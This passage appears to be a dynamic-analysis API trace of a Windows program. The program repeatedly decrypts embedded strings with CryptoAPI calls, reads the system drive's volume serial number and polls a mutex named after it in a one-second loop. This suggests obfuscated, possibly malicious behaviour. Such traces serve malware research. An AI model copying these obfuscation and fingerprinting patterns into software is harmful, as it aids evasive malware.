(dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x134 [0183.851] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x0) returned 0x102 [0183.851] CloseHandle (hObject=0x134) returned 1 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0183.851] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0183.851] Sleep (dwMilliseconds=0x3e8) [0184.858] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0184.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ca8) returned 1 [0184.858] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0184.858] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0184.858] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.858] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0184.858] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0184.858] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0184.858] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ca8) returned 1 [0184.858] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0184.858] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0184.858] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.858] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0184.858] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0184.858] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0184.858] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0184.858] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0184.859] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0184.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ca8) returned 1 [0184.859] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0184.859] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0184.859] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0184.859] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x178 [0184.859] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x0) returned 0x102 [0184.859] CloseHandle (hObject=0x178) returned 1 [0184.859] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0184.859] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0184.859] Sleep (dwMilliseconds=0x3e8) [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0185.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ae8) returned 1 [0185.874] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0185.874] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0185.874] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0185.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ae8) returned 1 [0185.874] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0185.874] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0185.874] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.874] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0185.874] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0185.874] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0185.874] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0185.874] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0185.874] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0185.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ae8) returned 1 [0185.874] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0185.874] CryptDecrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0185.874] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.874] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0185.874] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x178 [0185.874] WaitForSingleObject (hHandle=0x178, dwMilliseconds=0x0) returned 0x102 [0185.875] CloseHandle (hObject=0x178) returned 1 [0185.875] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0185.875] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0185.875] Sleep (dwMilliseconds=0x3e8) [0186.913] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0186.913] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0186.913] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0186.913] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0186.913] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.913] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0186.913] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0186.913] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0186.913] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0186.913] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0186.913] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0186.913] CryptDestroyKey (hKey=0xa32a28) returned 1 [0186.913] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0186.913] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0186.913] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0186.913] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0186.913] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0186.925] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0186.925] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0186.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa327e8) returned 1 [0186.925] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0186.925] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0186.925] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.925] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0186.925] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x14c [0186.925] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0186.925] CloseHandle (hObject=0x14c) returned 1 [0186.925] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0186.925] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0186.925] Sleep (dwMilliseconds=0x3e8) [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0187.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c28) returned 1 [0187.926] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0187.926] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0187.926] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0187.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c28) returned 1 [0187.926] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0187.926] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0187.926] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0187.926] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0187.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0187.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0187.926] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0187.926] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0187.926] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c28) returned 1 [0187.926] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0187.926] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0187.926] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0187.926] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x154 [0187.926] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0x0) returned 0x102 [0187.926] CloseHandle (hObject=0x154) returned 1 [0187.927] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0187.927] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0187.927] Sleep (dwMilliseconds=0x3e8) [0188.966] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0188.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa327e8) returned 1 [0188.966] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0188.966] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0188.966] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.966] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0188.966] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0188.966] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0188.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa327e8) returned 1 [0188.966] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0188.966] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0188.966] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.966] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0188.966] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0188.966] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0188.966] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0188.966] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0188.966] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0188.967] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0188.967] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa327e8) returned 1 [0188.967] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0188.967] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0188.967] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.967] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0188.967] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x14c [0188.967] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0188.967] CloseHandle (hObject=0x14c) returned 1 [0188.967] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0188.967] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0188.967] Sleep (dwMilliseconds=0x3e8) [0190.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0190.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32968) returned 1 [0190.039] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0190.039] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0190.039] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0190.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0190.039] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0190.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32968) returned 1 [0190.039] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0190.039] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0190.039] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0190.039] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0190.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0190.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0190.039] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0190.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0190.040] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0190.040] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32968) returned 1 [0190.040] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0190.040] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0190.040] CryptDestroyKey (hKey=0xa32968) returned 1 [0190.040] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0190.040] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xbc [0190.040] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0190.040] CloseHandle (hObject=0xbc) returned 1 [0190.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0190.040] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0190.040] Sleep (dwMilliseconds=0x3e8) [0191.478] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0191.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32be8) returned 1 [0191.479] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0191.479] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0191.479] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.479] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0191.479] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0191.479] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0191.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32be8) returned 1 [0191.479] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0191.479] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0191.479] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0191.479] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0191.479] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0191.479] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0191.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32be8) returned 1 